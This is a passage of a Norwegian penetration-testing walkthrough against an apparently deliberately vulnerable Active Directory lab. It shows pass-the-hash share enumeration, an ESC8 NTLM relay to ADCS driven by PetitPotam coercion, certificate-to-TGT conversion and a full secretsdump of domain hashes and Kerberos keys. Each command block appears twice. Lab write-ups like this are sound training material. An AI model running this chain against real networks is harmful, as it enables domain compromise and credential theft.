gmsaDragon$:aes128-cts-hmac-sha1-96:7c121eb9123f679c1904fde4a979dc8b
gmsaDragon$:des-cbc-md5:706bf845f4f2df1f
SEVENKINGDOMS$:aes256-cts-hmac-sha1-96:f9a4c9931fdcfb0562e22ea9274ba2be42a4bc311bcde8b91864cb44e7ee3fd6
SEVENKINGDOMS$:aes128-cts-hmac-sha1-96:b9a00bf0a4e7757c89878238b03a020d
SEVENKINGDOMS$:des-cbc-md5:94a4b63edfb04938
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

Og dersom vi for eksempel plukker ut daenerys.targaryen fra listen og mater hennes brukernavn og passordhash inn i netexec og prøver å enumerere SMB fileshares, så har vi full admintilgang på braavos og meereen.

$ netexec smb 10.3.2.10-30 -u daenerys.targaryen -H 34534854d33b398b66684072224bb47a --shares
SMB         10.3.2.11       445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False) 
SMB         10.3.2.23       445    BRAAVOS          [*] Windows 10 / Server 2016 Build 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True) 
SMB         10.3.2.12       445    MEEREEN          [*] Windows 10 / Server 2016 Build 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True) 
SMB         10.3.2.11       445    WINTERFELL       [-] north.sevenkingdoms.local\daenerys.targaryen:34534854d33b398b66684072224bb47a STATUS_LOGON_FAILURE 
SMB         10.3.2.22       445    CASTELBLACK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False) 
SMB         10.3.2.10       445    KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False) 
SMB         10.3.2.23       445    BRAAVOS          [+] essos.local\daenerys.targaryen:34534854d33b398b66684072224bb47a (Pwn3d!)
SMB         10.3.2.12       445    MEEREEN          [+] essos.local\daenerys.targaryen:34534854d33b398b66684072224bb47a (Pwn3d!)
SMB         10.3.2.22       445    CASTELBLACK      [+] north.sevenkingdoms.local\daenerys.targaryen:34534854d33b398b66684072224bb47a (Guest)
SMB         10.3.2.10       445    KINGSLANDING     [-] sevenkingdoms.local\daenerys.targaryen:34534854d33b398b66684072224bb47a STATUS_LOGON_FAILURE 
SMB         10.3.2.22       445    CASTELBLACK      [*] Enumerated shares
SMB         10.3.2.22       445    CASTELBLACK      Share           Permissions     Remark
SMB         10.3.2.22       445    CASTELBLACK      -----           -----------     ------
SMB         10.3.2.22       445    CASTELBLACK      ADMIN$                          Remote Admin
SMB         10.3.2.22       445    CASTELBLACK      all             READ,WRITE      Basic RW share for all
SMB         10.3.2.22       445    CASTELBLACK      C$                              Default share
SMB         10.3.2.22       445    CASTELBLACK      IPC$            READ            Remote IPC
SMB         10.3.2.22       445    CASTELBLACK      public                          Basic Read share for all domain users
SMB         10.3.2.23       445    BRAAVOS          [*] Enumerated shares
SMB         10.3.2.23       445    BRAAVOS          Share           Permissions     Remark
SMB         10.3.2.23       445    BRAAVOS          -----           -----------     ------
SMB         10.3.2.23       445    BRAAVOS          ADMIN$          READ,WRITE      Remote Admin
SMB         10.3.2.23       445    BRAAVOS          all             READ,WRITE      Basic RW share for all
SMB         10.3.2.23       445    BRAAVOS          C$              READ,WRITE      Default share
SMB         10.3.2.23       445    BRAAVOS          CertEnroll      READ,WRITE      Active Directory Certificate Services share
SMB         10.3.2.23       445    BRAAVOS          IPC$            READ            Remote IPC
SMB         10.3.2.23       445    BRAAVOS          public          READ,WRITE      Basic Read share for all domain users
SMB         10.3.2.12       445    MEEREEN          [*] Enumerated shares
SMB         10.3.2.12       445    MEEREEN          Share           Permissions     Remark
SMB         10.3.2.12       445    MEEREEN          -----           -----------     ------
SMB         10.3.2.12       445    MEEREEN          ADMIN$          READ,WRITE      Remote Admin
SMB         10.3.2.12       445    MEEREEN          C$              READ,WRITE      Default share
SMB         10.3.2.12       445    MEEREEN          IPC$            READ            Remote IPC
SMB         10.3.2.12       445    MEEREEN          NETLOGON        READ,WRITE      Logon server share 
SMB         10.3.2.12       445    MEEREEN          SYSVOL          READ,WRITE      Logon server share 
Running nxc against 21 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

$ netexec smb 10.3.2.10-30 -u daenerys.targaryen -H 34534854d33b398b66684072224bb47a --shares
SMB         10.3.2.11       445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False) 
SMB         10.3.2.23       445    BRAAVOS          [*] Windows 10 / Server 2016 Build 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True) 
SMB         10.3.2.12       445    MEEREEN          [*] Windows 10 / Server 2016 Build 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True) 
SMB         10.3.2.11       445    WINTERFELL       [-] north.sevenkingdoms.local\daenerys.targaryen:34534854d33b398b66684072224bb47a STATUS_LOGON_FAILURE 
SMB         10.3.2.22       445    CASTELBLACK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False) 
SMB         10.3.2.10       445    KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False) 
SMB         10.3.2.23       445    BRAAVOS          [+] essos.local\daenerys.targaryen:34534854d33b398b66684072224bb47a (Pwn3d!)
SMB         10.3.2.12       445    MEEREEN          [+] essos.local\daenerys.targaryen:34534854d33b398b66684072224bb47a (Pwn3d!)
SMB         10.3.2.22       445    CASTELBLACK      [+] north.sevenkingdoms.local\daenerys.targaryen:34534854d33b398b66684072224bb47a (Guest)
SMB         10.3.2.10       445    KINGSLANDING     [-] sevenkingdoms.local\daenerys.targaryen:34534854d33b398b66684072224bb47a STATUS_LOGON_FAILURE 
SMB         10.3.2.22       445    CASTELBLACK      [*] Enumerated shares
SMB         10.3.2.22       445    CASTELBLACK      Share           Permissions     Remark
SMB         10.3.2.22       445    CASTELBLACK      -----           -----------     ------
SMB         10.3.2.22       445    CASTELBLACK      ADMIN$                          Remote Admin
SMB         10.3.2.22       445    CASTELBLACK      all             READ,WRITE      Basic RW share for all
SMB         10.3.2.22       445    CASTELBLACK      C$                              Default share
SMB         10.3.2.22       445    CASTELBLACK      IPC$            READ            Remote IPC
SMB         10.3.2.22       445    CASTELBLACK      public                          Basic Read share for all domain users
SMB         10.3.2.23       445    BRAAVOS          [*] Enumerated shares
SMB         10.3.2.23       445    BRAAVOS          Share           Permissions     Remark
SMB         10.3.2.23       445    BRAAVOS          -----           -----------     ------
SMB         10.3.2.23       445    BRAAVOS          ADMIN$          READ,WRITE      Remote Admin
SMB         10.3.2.23       445    BRAAVOS          all             READ,WRITE      Basic RW share for all
SMB         10.3.2.23       445    BRAAVOS          C$              READ,WRITE      Default share
SMB         10.3.2.23       445    BRAAVOS          CertEnroll      READ,WRITE      Active Directory Certificate Services share
SMB         10.3.2.23       445    BRAAVOS          IPC$            READ            Remote IPC
SMB         10.3.2.23       445    BRAAVOS          public          READ,WRITE      Basic Read share for all domain users
SMB         10.3.2.12       445    MEEREEN          [*] Enumerated shares
SMB         10.3.2.12       445    MEEREEN          Share           Permissions     Remark
SMB         10.3.2.12       445    MEEREEN          -----           -----------     ------
SMB         10.3.2.12       445    MEEREEN          ADMIN$          READ,WRITE      Remote Admin
SMB         10.3.2.12       445    MEEREEN          C$              READ,WRITE      Default share
SMB         10.3.2.12       445    MEEREEN          IPC$            READ            Remote IPC
SMB         10.3.2.12       445    MEEREEN          NETLOGON        READ,WRITE      Logon server share 
SMB         10.3.2.12       445    MEEREEN          SYSVOL          READ,WRITE      Logon server share 
Running nxc against 21 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

Angrepsbane 2 – ESC8

En annen sårbarhet utnytter den sårbarheten vi nevnte tidligere, der CA-serveren kjører web-enrollment på HTTP, og dermed kan være sårbar for NTLM relay.

Fordi den er sårbar for relay kan vi forsøke å lure domenekontrolleren til å autentisere seg mot oss, og så kan vi videresende den autentiseringsforespørselen til sertifikatserveren, og etterspørre et sertifikat domenekontrolleren har lov til å få.

Fra certipy find kommandoen vi kjørte tidligere kan vi se følgende sertifikatmal, som kan brukes til autentisering. Som vi ser heter den “DomainControllerAuthentication” og kan brukes til både server- og klient-autentisering, og kan bare utstedes til domain admins, domain controllers, enterprise admins og enterprise domain controllers i Essos.local.

    Template Name                       : DomainControllerAuthentication
    Display Name                        : Domain Controller Authentication
    Certificate Authorities             : ESSOS-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireDns
    Enrollment Flag                     : AutoEnrollment
    Extended Key Usage                  : Client Authentication
                                          Server Authentication
                                          Smart Card Logon
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-09-11T18:49:37+00:00
    Template Last Modified              : 2025-09-11T18:49:37+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : ESSOS.LOCAL\Enterprise Read-only Domain Controllers
                                          ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\Domain Controllers
                                          ESSOS.LOCAL\Enterprise Admins
                                          ESSOS.LOCAL\Enterprise Domain Controllers
      Object Control Permissions
        Owner                           : ESSOS.LOCAL\Enterprise Admins
        Full Control Principals         : ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\Enterprise Admins
        Write Owner Principals          : ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\Enterprise Admins
        Write Dacl Principals           : ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\Enterprise Admins
        Write Property Enroll           : ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\Domain Controllers
                                          ESSOS.LOCAL\Enterprise Admins
                                          ESSOS.LOCAL\Enterprise Domain Controllers
        Write Property AutoEnroll       : ESSOS.LOCAL\Domain Controllers
                                          ESSOS.LOCAL\Enterprise Domain Controllers

    Template Name                       : DomainControllerAuthentication
    Display Name                        : Domain Controller Authentication
    Certificate Authorities             : ESSOS-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireDns
    Enrollment Flag                     : AutoEnrollment
    Extended Key Usage                  : Client Authentication
                                          Server Authentication
                                          Smart Card Logon
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-09-11T18:49:37+00:00
    Template Last Modified              : 2025-09-11T18:49:37+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : ESSOS.LOCAL\Enterprise Read-only Domain Controllers
                                          ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\Domain Controllers
                                          ESSOS.LOCAL\Enterprise Admins
                                          ESSOS.LOCAL\Enterprise Domain Controllers
      Object Control Permissions
        Owner                           : ESSOS.LOCAL\Enterprise Admins
        Full Control Principals         : ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\Enterprise Admins
        Write Owner Principals          : ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\Enterprise Admins
        Write Dacl Principals           : ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\Enterprise Admins
        Write Property Enroll           : ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\Domain Controllers
                                          ESSOS.LOCAL\Enterprise Admins
                                          ESSOS.LOCAL\Enterprise Domain Controllers
        Write Property AutoEnroll       : ESSOS.LOCAL\Domain Controllers
                                          ESSOS.LOCAL\Enterprise Domain Controllers

Dette sertifikatet vil la oss identifisere oss som om vi var domenekontrolleren i Essos, så det har vi lyst på.

Vi begynner med å sette opp NTLMRelayX til å peke mot ADCS web enrollment URLen på Braavos, klar til å etterspørre et “DomainControllerAuthentication” sertifikat.

$ impacket-ntlmrelayx -t http://braavos.essos.local/certsrv/ -smb2support --adcs --template DomainControllerAuthentication
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client RPC loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Multirelay disabled

[*] Servers started, waiting for connections

$ impacket-ntlmrelayx -t http://braavos.essos.local/certsrv/ -smb2support --adcs --template DomainControllerAuthentication
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client RPC loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Multirelay disabled

[*] Servers started, waiting for connections

Deretter kjører vi et såkalt “coercion” angrep kalt petitpotam som domenekontrolleren i dette tilfellet er sårbar for. Dette vil fremprovosere en autentiseringsforespørsel fra domenekontrolleren mot vår maskin. Vi trenger gyldige kredentialer for dette, men som vi kan se har vi allerede dette i form av sql_svc kontoen i dette eksempelet.

$ python3  ~/tools/PetitPotam/PetitPotam.py -u sql_svc -p YouWillNotKerboroast1ngMeeeeee -d essos.local 10.3.2.144 10.3.2.12
                                                                                              
              ___            _        _      _        ___            _                     
             | _ \   ___    | |_     (_)    | |_     | _ \   ___    | |_    __ _    _ __   
             |  _/  / -_)   |  _|    | |    |  _|    |  _/  / _ \   |  _|  / _` |  | '  \  
            _|_|_   \___|   _\__|   _|_|_   _\__|   _|_|_   \___/   _\__|  \__,_|  |_|_|_| 
          _| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""| 
          "`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' 
                                         
              PoC to elicit machine account authentication via some MS-EFSRPC functions
                                      by topotam (@topotam77)
      
                     Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN



Trying pipe lsarpc
[-] Connecting to ncacn_np:braavos.essos.local[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!

$ python3  ~/tools/PetitPotam/PetitPotam.py -u sql_svc -p YouWillNotKerboroast1ngMeeeeee -d essos.local 10.3.2.144 10.3.2.12
                                                                                              
              ___            _        _      _        ___            _                     
             | _ \   ___    | |_     (_)    | |_     | _ \   ___    | |_    __ _    _ __   
             |  _/  / -_)   |  _|    | |    |  _|    |  _/  / _ \   |  _|  / _` |  | '  \  
            _|_|_   \___|   _\__|   _|_|_   _\__|   _|_|_   \___/   _\__|  \__,_|  |_|_|_| 
          _| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""| 
          "`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' 
                                         
              PoC to elicit machine account authentication via some MS-EFSRPC functions
                                      by topotam (@topotam77)
      
                     Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN



Trying pipe lsarpc
[-] Connecting to ncacn_np:braavos.essos.local[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!

Det som skjer er at Meereen forsøker å autentisere seg mot oss, og vi videresender hashen til sertifikatserverens endepunkt for utstedelse av sertifikater, og presenterer påloggingsdetaljene til Meereen serveren, med en forespørsel om å få et signert sertifikat.

Øyeblikkelig ser vi følgende meldinger dukke opp i NTLMRelayX, og vi vet at vi har lykkes med å få tak i et gyldig sertifikat.

[*] SMBD-Thread-5 (process_request_thread): Received connection from 10.3.2.12, attacking target http://braavos.essos.local
[*] HTTP server returned error code 200, treating as a successful login
[*] Authenticating against http://braavos.essos.local as ESSOS/MEEREEN$ SUCCEED
[*] SMBD-Thread-7 (process_request_thread): Received connection from 10.3.2.12, attacking target http://braavos.essos.local
[*] HTTP server returned error code 200, treating as a successful login
[*] Authenticating against http://braavos.essos.local as ESSOS/MEEREEN$ SUCCEED
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] GOT CERTIFICATE! ID 22
[*] Writing PKCS#12 certificate to ./MEEREEN$.pfx
[*] Certificate successfully written to file

[*] SMBD-Thread-5 (process_request_thread): Received connection from 10.3.2.12, attacking target http://braavos.essos.local
[*] HTTP server returned error code 200, treating as a successful login
[*] Authenticating against http://braavos.essos.local as ESSOS/MEEREEN$ SUCCEED
[*] SMBD-Thread-7 (process_request_thread): Received connection from 10.3.2.12, attacking target http://braavos.essos.local
[*] HTTP server returned error code 200, treating as a successful login
[*] Authenticating against http://braavos.essos.local as ESSOS/MEEREEN$ SUCCEED
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] GOT CERTIFICATE! ID 22
[*] Writing PKCS#12 certificate to ./MEEREEN$.pfx
[*] Certificate successfully written to file

Vi utveksler sertifikatet mot en TGT, akkurat som vi gjorde i ESC13 angrepet.

$ certipy auth -pfx MEEREEN\$.pfx -dc-ip 10.3.2.12
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN DNS Host Name: 'meereen.essos.local'
[*] Using principal: 'meereen$@essos.local'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'meereen.ccache'
[*] Wrote credential cache to 'meereen.ccache'
[*] Trying to retrieve NT hash for 'meereen$'
[*] Got hash for 'meereen$@essos.local': aad3b435b51404eeaad3b435b51404ee:8cc3c31495780c7e2e13055cb61d890d

$ certipy auth -pfx MEEREEN\$.pfx -dc-ip 10.3.2.12
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN DNS Host Name: 'meereen.essos.local'
[*] Using principal: '[email protected]'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'meereen.ccache'
[*] Wrote credential cache to 'meereen.ccache'
[*] Trying to retrieve NT hash for 'meereen$'
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:8cc3c31495780c7e2e13055cb61d890d

Vi tar i bruk sertifikatet og sjekker at vi får tilgang.

$ export KRB5CCNAME=$(PWD)/meereen.ccache

$ impacket-secretsdump -k -no-pass meereen.essos.local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3629557c8649a89c73b9785a8191a1d4:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
daenerys.targaryen:1113:aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a:::
viserys.targaryen:1114:aad3b435b51404eeaad3b435b51404ee:d96a55df6bef5e0b4d6d956088036097:::
khal.drogo:1115:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb5c9d37021:::
jorah.mormont:1116:aad3b435b51404eeaad3b435b51404ee:4d737ec9ecf0b9955a161773cfed9611:::
missandei:1117:aad3b435b51404eeaad3b435b51404ee:1b4fd18edf477048c7a7c32fda251cec:::
drogon:1118:aad3b435b51404eeaad3b435b51404ee:195e021e4c0ae619f612fb16c5706bb6:::
sql_svc:1119:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
MEEREEN$:1001:aad3b435b51404eeaad3b435b51404ee:8cc3c31495780c7e2e13055cb61d890d:::
BRAAVOS$:1104:aad3b435b51404eeaad3b435b51404ee:ffcdc8585135b0ad6991f47eb3a69767:::
gmsaDragon$:1120:aad3b435b51404eeaad3b435b51404ee:7fc360a05308304d8a75c8dbe3a5201c:::
SEVENKINGDOMS$:1105:aad3b435b51404eeaad3b435b51404ee:5ed65337be5baf80e87377b374dc6913:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:284e2c4031851adcc0ca7dc0a821e0acfaa81e030e70571a38ffea50113ab8a5
krbtgt:aes128-cts-hmac-sha1-96:bdde69205c84534f0c7e9d85d512fe05
krbtgt:des-cbc-md5:0702c15d67c16445
daenerys.targaryen:aes256-cts-hmac-sha1-96:cf091fbd07f729567ac448ba96c08b12fa67c1372f439ae093f67c6e2cf82378
daenerys.targaryen:aes128-cts-hmac-sha1-96:eeb91a725e7c7d83bfc7970532f2b69c
daenerys.targaryen:des-cbc-md5:bc6ddf7ce60d29cd
viserys.targaryen:aes256-cts-hmac-sha1-96:b4124b8311d9d84ee45455bccbc48a108d366d5887b35428075b644e6724c96e
viserys.targaryen:aes128-cts-hmac-sha1-96:4b34e2537da4f1ac2d16135a5cb9bd3e
viserys.targaryen:des-cbc-md5:70528fa13bc1f2a1
khal.drogo:aes256-cts-hmac-sha1-96:2ef916a78335b11da896216ad6a4f3b1fd6276938d14070444900a75e5bf7eb4
khal.drogo:aes128-cts-hmac-sha1-96:7d76da251df8d5cec9bf3732e1f6c1ac
khal.drogo:des-cbc-md5:b5ec4c1032ef020d
jorah.mormont:aes256-cts-hmac-sha1-96:286398f9a9317f08acd3323e5cef90f9e84628c43597850e22d69c8402a26ece
jorah.mormont:aes128-cts-hmac-sha1-96:896e68f8c9ca6c608d3feb051f0de671
jorah.mormont:des-cbc-md5:b926916289464ffb
missandei:aes256-cts-hmac-sha1-96:41d08ceba69dde0e8f7de8936b3e1e48ee94f9635c855f398cd76262478ffe1c
missandei:aes128-cts-hmac-sha1-96:0a9a4343b11f3cce3b66a7f6c3d6377a
missandei:des-cbc-md5:54ec15a8c8e6f44f
drogon:aes256-cts-hmac-sha1-96:2f92317ed2d02a28a05e589095a92a8ec550b5655d45382fc877f9359e1b7fa1
drogon:aes128-cts-hmac-sha1-96:3968ac4efd4792d0acef565ac4158814
drogon:des-cbc-md5:bf1c85a7c8fdf237
sql_svc:aes256-cts-hmac-sha1-96:ca26951b04c2d410864366d048d7b9cbb252a810007368a1afcf54adaa1c0516
sql_svc:aes128-cts-hmac-sha1-96:dc0da2bdf6dc56423074a4fd8a8fa5f8
sql_svc:des-cbc-md5:91d6b0df31b52a3d
MEEREEN$:aes256-cts-hmac-sha1-96:627947a08303ffc008bb8984ac96f0c760fc3d2e5eb862b11edbd3533a10c768
MEEREEN$:aes128-cts-hmac-sha1-96:5c196a34f9258e725b2cbc62c72ff5c0
MEEREEN$:des-cbc-md5:2fe97f46b9253864
BRAAVOS$:aes256-cts-hmac-sha1-96:8d4c7ad755d68b03af90cf6a3961a6b594f8c9ea20b6d3ee0a97895d028d7f8e
BRAAVOS$:aes128-cts-hmac-sha1-96:82cbe868cf91352bd7cd6f6f50feb6f1
BRAAVOS$:des-cbc-md5:86dfd964d35e0ed9
gmsaDragon$:aes256-cts-hmac-sha1-96:ac426a3d054ae8e74d015db42a6b22cb05b1940072665f973601a38f44f11571
gmsaDragon$:aes128-cts-hmac-sha1-96:7c121eb9123f679c1904fde4a979dc8b
gmsaDragon$:des-cbc-md5:706bf845f4f2df1f
SEVENKINGDOMS$:aes256-cts-hmac-sha1-96:f9a4c9931fdcfb0562e22ea9274ba2be42a4bc311bcde8b91864cb44e7ee3fd6
SEVENKINGDOMS$:aes128-cts-hmac-sha1-96:b9a00bf0a4e7757c89878238b03a020d
SEVENKINGDOMS$:des-cbc-md5:94a4b63edfb04938
[*] Cleaning up...

$ export KRB5CCNAME=$(PWD)/meereen.ccache

$ impacket-secretsdump -k -no-pass meereen.essos.local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3629557c8649a89c73b9785a8191a1d4:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
daenerys.targaryen:1113:aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a:::
viserys.targaryen:1114:aad3b435b51404eeaad3b435b51404ee:d96a55df6bef5e0b4d6d956088036097:::
khal.drogo:1115:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb5c9d37021:::
jorah.mormont:1116:aad3b435b51404eeaad3b435b51404ee:4d737ec9ecf0b9955a161773cfed9611:::
missandei:1117:aad3b435b51404eeaad3b435b51404ee:1b4fd18edf477048c7a7c32fda251cec:::
drogon:1118:aad3b435b51404eeaad3b435b51404ee:195e021e4c0ae619f612fb16c5706bb6:::
sql_svc:1119:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
MEEREEN$:1001:aad3b435b51404eeaad3b435b51404ee:8cc3c31495780c7e2e13055cb61d890d:::
BRAAVOS$:1104:aad3b435b51404eeaad3b435b51404ee:ffcdc8585135b0ad6991f47eb3a69767:::
gmsaDragon$:1120:aad3b435b51404eeaad3b435b51404ee:7fc360a05308304d8a75c8dbe3a5201c:::
SEVENKINGDOMS$:1105:aad3b435b51404eeaad3b435b51404ee:5ed65337be5baf80e87377b374dc6913:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:284e2c4031851adcc0ca7dc0a821e0acfaa81e030e70571a38ffea50113ab8a5
krbtgt:aes128-cts-hmac-sha1-96:bdde69205c84534f0c7e9d85d512fe05
krbtgt:des-cbc-md5:0702c15d67c16445
daenerys.targaryen:aes256-cts-hmac-sha1-96:cf091fbd07f729567ac448ba96c08b12fa67c1372f439ae093f67c6e2cf82378
daenerys.targaryen:aes128-cts-hmac-sha1-96:eeb91a725e7c7d83bfc7970532f2b69c
daenerys.targaryen:des-cbc-md5:bc6ddf7ce60d29cd
viserys.targaryen:aes256-cts-hmac-sha1-96:b4124b8311d9d84ee45455bccbc48a108d366d5887b35428075b644e6724c96e
viserys.targaryen:aes128-cts-hmac-sha1-96:4b34e2537da4f1ac2d16135a5cb9bd3e
viserys.targaryen:des-cbc-md5:70528fa13bc1f2a1
khal.drogo:aes256-cts-hmac-sha1-96:2ef916a78335b11da896216ad6a4f3b1fd6276938d14070444900a75e5bf7eb4
khal.drogo:aes128-cts-hmac-sha1-96:7d76da251df8d5cec9bf3732e1f6c1ac
khal.drogo:des-cbc-md5:b5ec4c1032ef020d
jorah.mormont:aes256-cts-hmac-sha1-96:286398f9a9317f08acd3323e5cef90f9e84628c43597850e22d69c8402a26ece
jorah.mormont:aes128-cts-hmac-sha1-96:896e68f8c9ca6c608d3feb051f0de671
jorah.mormont:des-cbc-md5:b926916289464ffb
missandei:aes256-cts-hmac-sha1-96:41d08ceba69dde0e8f7de8936b3e1e48ee94f9635c855f398cd76262478ffe1c
missandei:aes128-cts-hmac-sha1-96:0a9a4343b11f3cce3b66a7f6c3d6377a
missandei:des-cbc-md5:54ec15a8c8e6f44f
drogon:aes256-cts-hmac-sha1-96:2f92317ed2d02a28a05e589095a92a8ec550b5655d45382fc877f9359e1b7fa1
drogon:aes128-cts-hmac-sha1-96:3968ac4efd4792d0acef565ac4158814
drogon:des-cbc-md5:bf1c85a7c8fdf237
sql_svc:aes256-cts-hmac-sha1-96:ca26951b04c2d410864366d048d7b9cbb252a810007368a1afcf54adaa1c0516
